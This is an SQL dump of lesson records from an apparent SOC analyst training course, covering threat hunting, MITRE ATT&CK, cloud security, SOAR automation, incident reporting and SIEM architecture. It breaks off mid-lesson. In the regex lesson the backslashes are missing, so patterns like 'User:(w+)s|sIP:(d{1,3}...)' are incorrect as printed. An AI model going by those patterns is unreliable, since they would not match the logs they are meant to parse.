(629, 305, '## Data Sources for Hunting\n\nYou generally need three types of data to hunt effectively.\n\n### 1. Process Execution (Endpoint is King)\n*   **What**: Windows Event 4688 / Sysmon Event 1 / EDR Data.\n*   **Why**: Shows exactly what ran.\n*   **Hunt**:\n    *   \"Show me processes running from `Temp` or `Downloads` folders.\"\n    *   \"Show me `svchost.exe` without a parent of `services.exe`.\"\n\n### 2. Network Connections ( The Wire)\n*   **What**: Firewall logs, Proxy logs, DNS logs.\n*   **Why**: Shows C2 and Exfiltration.\n*   **Hunt**:\n    *   \"Show me long connections (> 4 hours).\"\n    *   \"Show me connections to countries where we have no business.\"\n    *   \"Show me user laptops connecting directly to other user laptops (Peer-to-Peer lateral movement).\"\n\n### 3. Authentication Logs (Identity)\n*   **What**: Windows 4624/4625, VPN logs, Azure AD Sign-ins.\n*   **Why**: Shows stolen credentials.\n*   **Hunt**:\n    *   \"Show me a user logging in from 2 different cities in 1 hour.\"\n    *   \"Show me a Service Account logging in interactively (Service accounts should be batch/service types, not humans typing passwords).\"\n\n### Quality vs. Quantity\nMore logs is not always better.\n*   **Retention**: Hunting requires history. If you only keep 7 days of logs, you can\'t find an attacker who got in last month.\n*   **Granularity**: Firewall logs showing \"Block\" are useless for hunting. You need the \"Allow\" logs to find the successful attacker.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(630, 306, '## Hunting Techniques\n\n### 1. Stacking (Frequency Analysis)\nThe art of counting. \"Least Frequency of Occurrence\".\n*   **Concept**: Bad things are rare. Good things are common.\n*   **Method**:\n    *   Get all User-Agent strings from Proxy logs (1 million logs).\n    *   Group by User-Agent name.\n    *   Count them.\n    *   **Sort Ascending (Bottom Up)**.\n*   **Start**:\n    *   `Mozilla/5.0...` (Count: 900,000) -> Legit.\n    *   `curl/7.0` (Count: 50,000) -> Devs using curl.\n    *   `Python-urllib` (Count: 5) -> **INVESTIGATE**. Why 5? Who is running Python scripts connecting to the web?\n\n### 2. Clustering\nGrouping similar objects.\n*   You have 1000 processes named `svchost.exe`.\n*   Group them by \"Parent Process\", \"Command Line Arguments\", and \"User\".\n*   Cluster A: 990 run by SYSTEM, parent services.exe. (Normal).\n*   Cluster B: 10 run by \"Bob\", parent explorer.exe. (Anomalous).\n\n### 3. Baseline Comparison\n*   \"What is normal for Monday?\"\n*   Compare this Monday\'s traffic volume to the average of the last 10 Mondays.\n*   If volume is +500%, investigate.\n\n### 4. Grouping (Long Tail Analysis)\nSimilar to stacking but looking for *unique* values in high-volume datasets.\n*   Example: Hunt for rare file extensions executed.\n    *   `.exe`, `.dll` (Normal).\n    *   `.scr`, `.pif`, `.hta` (Rare and often malicious).\n    *   If you see `invoice.scr`, it is almost certainly malware.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(631, 307, '## Module 30 Review\nThreat Hunting pushes the security posture forward.\n*   It finds what the SIEM missed.\n*   It assumes breach.\n*   It feeds new rules back into detection.\n\nNext: The map of the attacker\'s mind (MITRE ATT&CK).', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 14:20:29'),
(632, 311, '## What is MITRE ATT&CK?\n\n**MITRE ATT&CK** (Adversarial Tactics, Techniques, and Common Knowledge) is the periodic table of hacking. It is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.\n\n### Why was it created?\nBefore ATT&CK, we described threats vaguely: \"The malware infects the computer.\"\nATT&CK forces us to be specific: \"The malware achieves **Persistence** [TA0003] using **Registry Run Keys** [T1547.001].\"\n\n### The Structure\nIt is a Matrix (Grid).\n1.  **Tactics (Columns)**: The goal. (Why are they doing this? e.g., \"To steal passwords\").\n2.  **Techniques (Cells)**: The method. (How are they doing this? e.g., \"OS Credential Dumping\").\n3.  **Procedures (Details)**: The specific implementation. (e.g., \"Using Mimikatz.exe\").\n    *   This gives us the acronym **TTPs**.\n\n### Why Analysts Need It\n1.  **Standardized Language**: A distinct common language. \"T1059.001\" means the same thing to an analyst in Japan as it does to one in the USA.\n2.  **Mapping Defenses**: You can map your EDR coverage to the matrix. \"We cover 90% of Execution techniques, but only 10% of Exfiltration techniques. We need to buy a DLP tool.\"\n3.  **Threat Intelligence**: Reports say \"Group X uses T1053\". You can instantly look up T1053 (Scheduled Task) and see if you can detect it.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(633, 312, '## Tactics: The \"Why\" (The Top Row)\n\nTactics represent the **Adversary\'s Goals**. There are 14 Tactics in the Enterprise Matrix. You should memorize the flow of an attack.\n\n1.  **Reconnaissance**: Gathering info (Scanning, LinkedIn research).\n2.  **Resource Development**: Buying servers, stealing accounts.\n3.  **Initial Access**: Getting in (Phishing, Exploit).\n4.  **Execution**: Running code (`calc.exe`).\n5.  **Persistence**: Staying in (Reboot survival).\n6.  **Privilege Escalation**: Getting Root/Admin.\n7.  **Defense Evasion**: Hiding (Deleting logs, turning off AV).\n8.  **Credential Access**: Stealing passwords.\n9.  **Discovery**: Looking around (\"Where am I?\").\n10. **Lateral Movement**: Jumping to other computers.\n11. **Collection**: Gathering data needed.\n12. **Command and Control (C2)**: Talking to the boss.\n13. **Exfiltration**: Stealing the data (Sending it out).\n14. **Impact**: Destroying data (Wiping, Encrypting).\n\n**Note**: Attackers don\'t always follow this order linearly, but it is the general lifecycle.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(634, 313, '## Techniques: The \"How\" (The Cells)\n\nUnder each Tactic, there are many Techniques. A Technique is a specific way to achieve the goal.\n\n### Sub-Techniques\nIn 2020, MITRE added Sub-Techniques (T1xxx.001) because the matrix was getting too crowded.\n*   **Technique**: **Brute Force (T1110)**.\n    *   **Sub-Technique**: .001 Password Guessing.\n    *   **Sub-Technique**: .002 Password Cracking.\n    *   **Sub-Technique**: .003 Password Spraying.\n    *   **Sub-Technique**: .004 Credential Stuffing.\n\n### Example: Phishing (T1566)\n*   **Tactic**: Initial Access.\n*   **Technique**: Phishing.\n*   **Sub-Techniques**:\n    *   Spearphishing Attachment (Sending a doc).\n    *   Spearphishing Link (Sending a URL).\n    *   Spearphishing via Service (LinkedIn/WhatsApp message).\n\n### Using the Knowledge Base\nWhen you click a Technique on the MITRE website, it tells you:\n1.  **Description**: How it works.\n2.  **Procedure Examples**: Which hacker groups have used this? (e.g., \"APT28 used this in 2016\").\n3.  **Mitigations**: How to stop it (Disable RDP).\n4.  **Detection**: How to find it (Event ID 4624).\n*This is basically a cheat sheet for your job.*', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(635, 314, '## Navigating the Matrix\n\nYou will use the **MITRE ATT&CK Navigator**, a web-based tool to color-code the matrix.\n\n### Use Case 1: Threat Profiling\n*   Select \"APT29\" (The SolarWinds hackers).\n*   The Navigator highlights all techniques used by APT29 in Red.\n*   Now you know exactly what to look for to find them.\n\n### Use Case 2: Defense Coverage \"Heatmap\"\n*   Color Green: Techniques we can **Prevent** (Firewall blocks).\n*   Color Yellow: Techniques we can **Detect** (SIEM rules alerts).\n*   Color Red: Techniques we are **Blind** to (No logs).\n*   *Result*: A visual map showing your boss where to spend budget. \"Look, we are all Red in the \'Cloud\' column. We need cloud security.\"\n\n### Layers\nYou can layer views.\n*   Layer 1: Defenses.\n*   Layer 2: APT29.\n*   **Overlay**: Show where APT29 overlaps with our Red (Blind) spots. **This is your priority list**.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(636, 315, '## Using ATT&CK for Defense\n\nHow do we actually use this in the SOC?\n\n### 1. Alert Enrichment\nWhen an alert fires in the SIEM, tag it with the T-Code.\n*   Bad: \"Alert: PowerShell detected.\"\n*   Good: \"Alert: **T1059.001** PowerShell Execution detected.\"\n*   Why? This allows you to run metrics later. \"We saw 500 T1059 alerts this month.\"\n\n### 2. Gap Analysis\n*   \"We have 50 SIEM rules.\"\n*   Map them to ATT&CK.\n*   \"Oh, wait. 49 of them are for **Malware** (Execution), and 1 is for **Phishing**. We have ZERO rules for **Exfiltration**.\"\n*   Action: Write rules for Exfiltration.\n\n### 3. Adversary Emulation (Red Teaming)\n*   Instead of just \"pentesting\" (finding random bugs), tell the Red Team: \"Emulate **Fin7**.\"\n*   The Red Team will look up Fin7\'s ATT&CK profile and use *only* those techniques.\n*   This tests if your SOC can catch that specific threat actor.\n\n### The Pyramid of Pain Connection\nMITRE ATT&CK focuses on TTPs (The top of the pyramid). If you defend against Techniques (e.g., \"Block all unsigned usage of PowerShell\"), you stop *every* attacker who uses PowerShell, not just one specific script.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(637, 316, '## Module 31 Review\nYou have completed the Core SOC Skills.\n*   You know the workflow (IR).\n*   You know the tools (SIEM, EDR, IDS).\n*   You know the map (ATT&CK).\n\nNext: Cloud Security and Automation (The future of SOC).', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 14:20:29'),
(638, 321, '## Cloud Service Models: Who manages what?\n\nTo secure the cloud, you must understand the \"Pizza-as-a-Service\" analogies.\n\n### 1. On-Premises (Traditional IT)\n*   **Concept**: You own everything. The building, the AC, the servers, the cables, the OS, the App.\n*   **Pizza**: You buy flour, cheese, an oven, gas, and make the pizza at home.\n*   **Security**: You are responsible for 100% of the stack.\n\n### 2. IaaS (Infrastructure as a Service)\n*   **Concept**: You rent the hardware (VMs). Amazon manages the data center and the hypervisor. You manage the OS and up.\n*   **Pizza**: You buy a frozen pizza (App) and bake it in a rented oven (Infrastructure).\n*   **Examples**: AWS EC2, Azure VM, Google Compute Engine.\n*   **Security**: You must patch Windows/Linux. Amazon secures the physical building.\n\n### 3. PaaS (Platform as a Service)\n*   **Concept**: You just bring your code. The provider manages the Hardware AND the OS.\n*   **Pizza**: You order pizza delivery.\n*   **Examples**: AWS Lambda, Azure SQL Database, Google App Engine, Heroku.\n*   **Security**: You secure your *Code* and *Identity*. You cannot patch the OS (AWS does it).\n\n### 4. SaaS (Software as a Service)\n*   **Concept**: You just use the software.\n*   **Pizza**: You go to a restaurant.\n*   **Examples**: Gmail, Salesforce, Dropbox, Slack.\n*   **Security**: You only manage **Access** (Who can log in?) and **Data** (What files do we upload?).\n\n### Why this matters for the SOC?\nIf you get an alert for a SaaS app (Salesforce), checking the \"CPU usage\" is impossible. You have no server access. You can only check \"Login Logs\".\nIf you get an alert for IaaS (EC2), you *can* check CPU usage and likely have Shell access.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(639, 322, '## The Shared Responsibility Model\n\nThis is the most critical concept in Cloud Security. It answers: **\"If we get hacked, whose fault is it?\"**\n\n### The Line in the Sand\n*   **Cloud Provider (AWS/Azure)**: Responsible for security **OF** the Cloud.\n    *   Physical security (Guards, Fences).\n    *   Power/Cooling.\n    *   Hypervisor vulnerabilities.\n    *   Network cabling.\n*   **Customer (You)**: Responsible for security **IN** the Cloud.\n    *   Your Data.\n    *   Your User Accounts (IAM).\n    *   Your OS Patches (for IaaS).\n    *   Your Firewall Rules (Security Groups).\n\n### The \"S3 Bucket\" Scenario\n*   **Scenario**: A company leaves an S3 bucket (storage folder) \"Public\". Hackers steal 1 million customer records.\n*   **Who is at fault?** The Customer.\n*   **Why?** AWS gave you the tools to make it private. You chose (or forgot) to make it public. AWS secured the hard drive so no one could steal the physical disk, but they cannot stop you from publishing your own data.\n\n### The Variance\nThe line moves based on the service model.\n*   **IaaS**: You do more work (Patching, Antivirus).\n*   **SaaS**: You do less work (Just Identity/Data).\n\n### SOC Implications\nIn the cloud, **Identity is the new Perimeter**.\n*   In On-Prem, we trusted people inside the firewall.\n*   In Cloud, there is no firewall around the API. If an attacker steals an API Key or Admin Password, they *are* the Admin.\n*   Therefore, **MFA (Multi-Factor Authentication)** is the single most important control in the cloud.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(640, 323, '## AWS Security Fundamentals\n\nSince AWS is the biggest player, let\'s look at its core security services. (Azure/GCP have equivalents).\n\n### 1. IAM (Identity and Access Management)\nThe gatekeeper.\n*   **Users**: People (Bob).\n*   **Roles**: Hats that people/machines wear.\n    *   *Best Practice*: Don\'t give an EC2 instance a password. Give it a **Role** allowing access to S3.\n*   **Policies**: JSON documents defining rules.\n    *   `Effect: Allow`, `Action: s3:GetObject`, `Resource: my-bucket/*`.\n*   **Principle of Least Privilege**: Give only the permissions needed. Nothing more.\n\n### 2. CloudTrail (The Black Box)\n*   **What**: Logs EVERY API call made in the account.\n*   **Example**: \"User \'Alice\' called \'TerminateInstance\' on server i-12345 at 2 PM from IP 1.2.3.4\".\n*   **SOC Use**: This is your primary log source for investigation.\n\n### 3. GuardDuty (The IDS)\n*   **What**: Threat Detection service.\n*   **How**: Analyzes CloudTrail, VPC Flow Logs (Network), and DNS logs using ML.\n*   **Alerts**: \"EC2 instance is mining Bitcoin\", \"API Key used from Tor Node\".\n\n### 4. Security Groups (The Firewall)\n*   **What**: Stateful firewall for EC2 instances.\n*   **Rules**: \"Allow Port 80 from Anywhere\". \"Allow Port 22 from Office IP only\".\n*   **Common Mistake**: `0.0.0.0/0` on Port 22 (SSH Open to the world = Hacked in 5 minutes).\n\n### 5. VPC (Virtual Private Cloud)\n*   Your isolated network slice of the cloud.\n*   **Public Subnet**: Can talk to Internet.\n*   **Private Subnet**: Only talks internally (Database).\n*   **NACL**: Stateless firewall at the subnet level.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(641, 324, '## Azure Security Fundamentals\n\nMicrosoft Azure is massive in the corporate world. It is tightly integrated with Active Directory.\n\n### 1. Entra ID (Formerly Azure AD)\nThis is NOT just Active Directory in the cloud. It is a completely different identity system using OIDC/SAML protocols.\n*   **Conditional Access**: \"If user is Admin AND location is China -> Block.\"\n*   **PIM (Privileged Identity Management)**: \"Just-in-Time\" admin access. You aren\'t Admin 24/7. You request admin access for 1 hour to fix a server, then it expires.\n\n### 2. Azure Sentinel (The SIEM)\nCloud-native SIEM. (Covered in Module 22).\n\n### 3. Defender for Cloud (ASC)\n*   **CSPM (Cloud Security Posture Management)**: Scans your account for bad configs.\n    *   \"Hey, you have an SQL Database with no encryption.\"\n    *   \"Hey, you have `0.0.0.0` on your VM.\"\n*   **Secure Score**: Gamifies security. \"Your score is 45%. Turn on MFA to get +10 points.\"\n\n### 4. NSG (Network Security Group)\nThe equivalent of AWS Security Groups. Content firewall rules.\n\n### 5. Log Analytics Workspace\nThe central bucket where all logs (VMs, Firewalls, Entra ID) are dumped for querying (using KQL).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(642, 325, '## Cloud Misconfigurations\n\nAttacking the cloud is rarely about \"Zero Day Exploits\". It is about finding **Misconfigurations**.\nAccording to Gartner, 99% of cloud breaches are the customer\'s fault.\n\n### Top Misconfigurations\n1.  **Public Storage Buckets**: S3 buckets set to \"Public Read\".\n2.  **Over-Permissive IAM**: Giving a user `AdministratorAccess` instead of just `S3ReadOnly`.\n3.  **Open Security Groups**: Allowing SSH (Port 22) from `0.0.0.0/0` (The whole internet).\n4.  **Disabled Logging**: Turning off CloudTrail. (Now you have no evidence).\n5.  **Exposed Keys**: Hardcoding AWS Access Keys in GitHub code.\n\n### CSPM (Cloud Security Posture Management)\nTools like **Wiz**, **Prisma Cloud**, or **AWS Security Hub** that scan for these mistakes automatically.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(643, 326, '## Module 32 Review\nCloud Security is about Identity and Configuration.\n*   **IaaS/PaaS/SaaS** dictates what you own.\n*   **Shared Responsibility**: You verify the lock; Provider verifies the door.\n*   **Misconfigurations** are the #1 enemy.\n\nNext: Automating the boring stuff (SOAR).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(644, 331, '## Why Automate Security?\n\nThe SOC is drowning.\n*   **Alert Volume**: 10,000 alerts/day.\n*   **Staff**: 5 Analysts.\n*   **Math**: Impossible.\n\n### The Solution: SOAR (Security Orchestration, Automation, and Response)\nSOAR tools replace manual, repetitive clicks with code.\n\n### Benefits\n1.  **Speed**: A human takes 20 minutes to block an IP on 10 firewalls. A script takes 1 second.\n2.  **Consistency**: Humans make typos. Scripts do exactly what they are told.\n3.  **Morale**: No analyst wants to spend 8 hours resetting passwords. Automate the boring stuff so analysts can hunt.\n\n### The \"O\" in Orchestration\nConnecting different tools.\n*   \"Take the IP from Splunk.\"\n*   \"Check it in VirusTotal.\"\n*   \"Send a Slack message.\"\n*   \"Add to Palo Alto firewall.\"\nThese tools don\'t talk to each other natively. SOAR is the glue (API Connector).\n\n### Risks of Automation\n**Automating a bad process just breaks things faster.**\n*   *Bad Rule*: \"Block any IP that fails login 5 times.\"\n*   *Scenario*: CEO forgets password.\n*   *Automation*: Blocks the entire office NAT IP.\n*   *Result*: Fireable offense.\n*   *Fix*: Always have a \"Human in the Loop\" for destructive actions until you are 100% sure.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(645, 332, '## SOAR Platforms Overview\n\n### 1. Palo Alto XSOAR (Demisto)\nThe market leader.\n*   Uses a drag-and-drop playbook editor.\n*   Thousands of integrations.\n*   \"War Room\" feature where chat and commands are mixed.\n\n### 2. Splunk SOAR (Phantom)\n*   Tightly integrated with Splunk.\n*   Python-centric.\n\n### 3. Tines\n*   The modern, lightweight challenger.\n*   No-code. Looks like a flowchart. Very popular because it is easy to learn.\n\n### 4. Microsoft Logic Apps / Sentinel\n*   If you use Sentinel, you create \"Playbooks\" using Logic Apps.\n*   Very cheap and powerful for Azure environments.\n\n### The Workflow of a Playbook\n1.  **Trigger**: New Alert from SIEM.\n2.  **Enrichment**:\n    *   Query threat intel (VirusTotal).\n    *   Query LDAP (Get user\'s manager).\n3.  **Decision (Condition)**:\n    *   Is it Malicious? (VirusTotal > 5/70).\n4.  **Action**:\n    *   If Yes -> Isolate Host.\n    *   If No -> Close Ticket as False Positive.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(646, 333, '## Playbook Design\n\nA **Playbook** is the coded logic of a Standard Operating Procedure (SOP).\n\n### Common Logic Blocks\n1.  **Trigger**: New Phishing Alert.\n2.  **Action**: Extract URL.\n3.  **Enrichment**: Check URL reputation (VirusTotal).\n4.  **Decision (Software)**:\n    *   If VT Score > 5: **BLOCK** and Close Ticket.\n    *   If VT Score < 5: Ask Analyst to review.\n\n### Human-in-the-Loop\nYou don\'t automate *everything*. \nCritical decisions (e.g., \"Shut down the CEO\'s laptop\") should prompt a human for \"Yes/No\" approval via Slack/Email.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(647, 334, '## Common Automation Use Cases\n\nWhere should you start automating?\n\n### 1. Phishing Triage (The #1 Time sink)\n*   **Manual**: Analyst opens email, extracts URL, checks URLScan.io, checks sender IP... (15 mins).\n*   **Automated**: User forwards email to `phish@company.com`. SOAR extracts artifacts, scans them, and only alerts the analyst if it finds a malicious link. (0 mins human time for clean emails).\n\n### 2. Malware Containment\n*   **Trigger**: EDR detects Ransomware.\n*   **Action**: Automatically isolate the host via API call to EDR.\n*   **Why**: Speed is critical. If you wait 20 minutes for a human to see the ticket, the whole network is encrypted.\n\n### 3. User Onboarding/Offboarding\n*   **Trigger**: HR system says \"Bob is fired\".\n*   **Action**: Disable Active Directory account, revoke VPN, wipe mobile device.\n\n### 4. Threat Intel Management\n*   **Trigger**: New IOC list from CISA.\n*   **Action**: Push IPs to firewall blocklist automatically.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(648, 335, '## Python for Security Automation\n\nYou don\'t need to be a Developer, but you must know how to Script. **Python** is the language of Security.\n\n### Why Python?\n*   **Libraries**: `requests` (HTTP), `pandas` (Data), `boto3` (AWS).\n*   **Readability**: Easy to read code.\n*   **APIs**: Almost every security tool has a REST API, and Python is great at talking to APIs.\n\n### Key Concepts for SOC\n1.  **JSON Parsing**: Every API returns JSON. You need to know how to dig into dictionaries within lists. `data[\'alerts\'][0][\'source_ip\']`.\n2.  **Requests**: `response = requests.get(url, headers=api_key)`.\n3.  **Regex**: Extracting IPs from text blobs.\n\n### Example Script Idea\n*   Input: `suspicious_ips.txt`.\n*   Loop: For each IP...\n*   Action: Check AbuseIPDB API.\n*   Logic: If confidence > 90...\n*   Output: Write to `firewall_blocklist.csv`.\n\n**Lab Tip**: In this module\'s lab, you will write a simple script to parse a log file. Do not fear the code; it is just logic written in text.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:18'),
(649, 336, '## Module 33 Review\nAutomation is a force multiplier.\n*   **SOAR**: The platform for automation.\n*   **Playbooks**: The logic charts.\n*   **Outcome**: Faster response, happier analysts.\n\nNext: The final skill - Communication (Reporting).', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(650, 341, '## Why Documentation Matters\n\nIf you didn\'t document it, it didn\'t happen.\nIn a legal case, your notes are evidence.\n\n### Who reads your report?\n1.  **Other Analysts**: \"Has this happened before?\"\n2.  **Your Boss**: \"Is the team busy? Do we need more budget?\"\n3.  **The Auditors**: \"Did you follow the process?\"\n4.  **The Lawyers**: \"Did we exercise due diligence?\"\n\n### Types of Documentation\n*   **Ticket Notes**: Rough, real-time notes inside the case.\n*   **Incident Reports**: Formal summary after the fact.\n*   **Runbooks/SOPs**: Instructions on *how* to do things.\n*   **Change Logs**: Records of system modifications.\n\n### The Bus Factor\nIf you are the only one who knows how the firewall works, and you get hit by a bus (or win the lottery), the company fails. Documentation increases the \"Bus Factor\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(651, 342, '## Incident Timelines\n\nThe most critical part of an Incident Report.\n\n### Precision is Key\n*   **Bad**: \"The hacker got in around noon.\"\n*   **Good**: \"12:01:45 PM UTC - Attacker IP 1.2.3.4 successfully authenticated.\"\n\n### UTC vs Local Time\n**ALWAYS USE UTC**.\n*   Attacker is in Russia (+3).\n*   Server is in AWS (+0).\n*   Analyst is in New York (-5).\n*   Management is in California (-8).\nUsing local time creates a disaster. Standardize on UTC.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(652, 343, '## Writing Effective Reports\n\n### Know Your Audience\n1.  **Technical Audience (CTO, Engineers)**:\n    *   Wants: IP addresses, Hashes, root cause, exact commands used.\n    *   Tone: Precise, technical.\n2.  **Executive Audience (CEO, Board)**:\n    *   Wants: Risk level, Financial impact, \"Is it fixed?\", \"How do we prevent it?\"\n    *   Tone: High-level, money-focused. **No jargon**.\n    *   *Bad*: \"The APT used a Heap Spray exploit.\"\n    *   *Good*: \"Sophisticated attackers compromised a web server.\"\n\n### The 5 W\'s\n*   **Who** (Attacker/Victim)?\n*   **What** (Happened)?\n*   **When** (Timeline)?\n*   **Where** (Systems)?\n*   **Why** (Motive)?', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(653, 344, '## Effective Report Writing: The Executive Summary\n\nThe most important part of any report is the first page. Executives will **only** read the first page.\n\n### The BLUF (Bottom Line Up Front)\nStart with the conclusion.\n*   **Bad**: \"On Monday we saw a log. Then we looked at it. It was weird...\"\n*   **Good**: \"We prevented a Ransomware attack on the Finance Server. No data was lost. 1 laptop is currently being reimaged.\"\n\n### Key Elements of Exec Summary\n1.  **What happened?** (High level).\n2.  **What was the impact?** (Data lost? Money lost? Downtime?).\n3.  **What did we do?** (Fixed it?).\n4.  **What is the risk now?** (Safe? Controlled?).\n5.  **What do we need?** (Approval to buy x?).\n\n### Language\nAvoid jargon.\n*   *No*: \"The APT initiated a C2 beacon via DNS tunneling.\"\n*   *Yes*: \"The attacker established a hidden connection to control our server.\"\nSpeak in \"Business Risk\", not \"Technobabble\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(654, 345, '## Metrics and KPIs\n\nHow do we measure the SOC\'s performance?\n\n### MTTD (Mean Time To Detect)\n*   How long does the attacker stay hidden?\n*   *Goal*: Minimize this. (World average is ~20 days. Goal is <1 hour).\n\n### MTTR (Mean Time To Respond/Remediate)\n*   Once detected, how fast do we fix it?\n*   *Goal*: Minimize this.\n\n### False Positive Rate\n*   Are we burning out analysts with bad alerts?\n\n### Dwell Time\n*   Total time the adversary had access.\n\nGood metrics drive budget. \"Our MTTD dropped 50% since we bought Tool X.\"', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(655, 346, '## Module 34 Review\nYou have completed the entire Path 3: SOC Analyst Level 1.\n\n### Journey Recap\n1.  **SIEM/EDR/IDS**: The tools.\n2.  **Malware/IR**: The threats and response.\n3.  **Network/Hunting**: The deeper analysis.\n4.  **Cloud/Automation**: The modern environment.\n5.  **Reporting**: The professional output.\n\nCongratulations! You are now ready for the Path 3 Certification Exam.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(656, 361, '## SIEM Architecture Deep Dive\n\nWelcome to the big leagues. In Path 3, we treated the SIEM as a black box that just \"works\". In Advanced SOC roles, you need to know *how* it works, because you will be the one fixing it when it breaks.\n\n### The Pipeline of Data\nA typical Enterprise SIEM (like Splunk or ELK) has a distributed architecture.\n\n1.  **Generation**: The endpoint (Windows) or device (Firewall) creates the log.\n2.  **Collection (The Edge)**:\n    *   **Universal Forwarder (Splunk) / Beats (Elastic)**: Small agents on the endpoint.\n    *   **Syslog Server**: A Linux box acting as a funnel for network devices.\n    *   *Bottleneck Risk*: If the Syslog server disk fills up, you lose firewall logs instantly.\n3.  **Aggregation (The Middleman)**:\n    *   **Heavy Forwarder (Splunk) / Logstash**: Intermediate servers that parse, filter, and mask data (e.g., removing Credit Card numbers) *before* sending it to the core.\n    *   *Why?* To save bandwidth and CPU on the main indexers.\n4.  **Indexing (The Core)**:\n    *   **Indexers**: The heavy lifters. They write the data to disk.\n    *   *Clustering*: Data is replicated across multiple indexers for High Availability.\n5.  **Search Head (The User Interface)**:\n    *   This is what you log into. It doesn\'t store data. It distributes your query to the Indexers, merges the results, and shows you the graph.\n\n### Hot, Warm, Cold Buckets\nStorage is expensive. We can\'t keep petabytes on SSDs.\n*   **Hot Bucket**: Data arriving *right now*. Stored on NVMe SSDs for instant search. (Retained: ~7 days).\n*   **Warm Bucket**: Data from last week. Read-only. Stored on SSDs. (Retained: ~30 days).\n*   **Cold Bucket**: Data from last month. Moved to cheaper HDDs. Slower to search. (Retained: ~1 year).\n*   **Frozen**: Data archived to Amazon S3 Glacier (Tape). Unsearchable unless you \"thaw\" it. (Retained: 5-7 years for legal).\n\n### EPS (Events Per Second) Sizing\n*   **Scenario**: A firewall sends 10,000 logs/second.\n*   **Math**: 10k EPS * 500 bytes/log = 5 MB/second = 432 GB/day.\n*   **Impact**: Can your Indexer write 5 MB/s continuously while *also* answering search queries? If not, you need more hardware.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(657, 362, '## Log Parsing & Normalization: The Regex Dojo\n\nYou cannot be a Senior Analyst without knowing Regex (Regular Expressions). When standard parsers fail, you must write your own.\n\n### The Problem: Unstructured Data\nA developer writes a custom app that logs errors like this:\n`[ERROR] User:bob | IP:10.0.0.1 | Msg:Login Failed`\n\nYour SIEM doesn\'t know what \"User:bob\" means. You need to extract \"bob\" into the `user` field.\n\n### Regex Basics\n*   `d`: Any digit (0-9).\n*   `w`: Any word character (a-z, 0-9, _).\n*   `s`: Whitespace.\n*   `+`: One or more.\n*   `*`: Zero or more.\n*   `?`: Optional.\n*   `( )`: Capture group (The part you want to extract).\n\n### Example Extraction\nLog: `[ERROR] User:bob | IP:10.0.0.1`\n\n**Bad Regex**: `User:.* |`\n*   Why? `.*` is greedy. It matches everything until the end. Precise matching is efficient.\n\n**Good Regex**: `User:(w+)s|sIP:(d{1,3}.d{1,3}.d{1,3}.d{1,3})`\n*   Group 1 (`w+`) matches \"bob\".\n*   Group 2 matches the IP.\n\n### Splunk Field Extraction (props.conf / transforms.conf)\nIn Splunk, you define these in config files.\n*   `[my_custom_app]`\n*   `EXTRACT-user = User:(w+)`\n\n### Field Aliasing (CIM Compliance)\n*   Your app logs it as `client_ip`.\n*   Splunk CIM expects `src`.\n*   **Alias**: `FIELDALIAS-c_ip = client_ip AS src`\n*   Now, a search for `src=10.0.0.1` will find your logs automatically.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(658, 363, '## Advanced Correlation: Risk-Based Alerting (RBA)\n\nTraditional correlation (\"3 failed logins = Alert\") generates too much noise. **RBA** is the modern approach managed by Advanced SOCs.\n\n### The Concept\nInstead of triggering an alert *immediately*, we assign **Risk Points** to an entity (User or System).\n\n*   **Rule 1**: User triggered \"Possible Phishing Link\". (Confidence: Low).\n    *   Current Logic: Alert Analyst -> False Positive 90%.\n    *   RBA Logic: Add **+10 Risk Points** to User. (No Alert).\n*   **Rule 2**: User triggered \"Unusual PowerShell\". (Confidence: Medium).\n    *   RBA Logic: Add **+30 Risk Points** to User.\n*   **Rule 3**: User triggered \"Data Upload to Personal Cloud\". (Confidence: Low).\n    *   RBA Logic: Add **+20 Risk Points** to User.\n\n### The Threshold Alert\n*   **Total Risk Score**: 10 + 30 + 20 = **60**.\n*   **Threshold Rule**: \"Alert when Risk Score > 50\".\n*   **Result**: The analyst gets ONE high-fidelity alert (\"User with Risk 60\") that tells the whole story, instead of 3 low-fidelity alerts.\n\n### Implementing Kill Chains\nAdvanced correlation tracks the sequence.\n`transaction` command in Splunk loops events together by ID.\n*   If `Event A` (Firewall Permit) AND `Event B` (IDS SQL Injection) occur within 10 seconds...\n*   Combine them into a generic \"Exploit Attempt\" meta-event.\n\n### Statistical Anomaly Detection 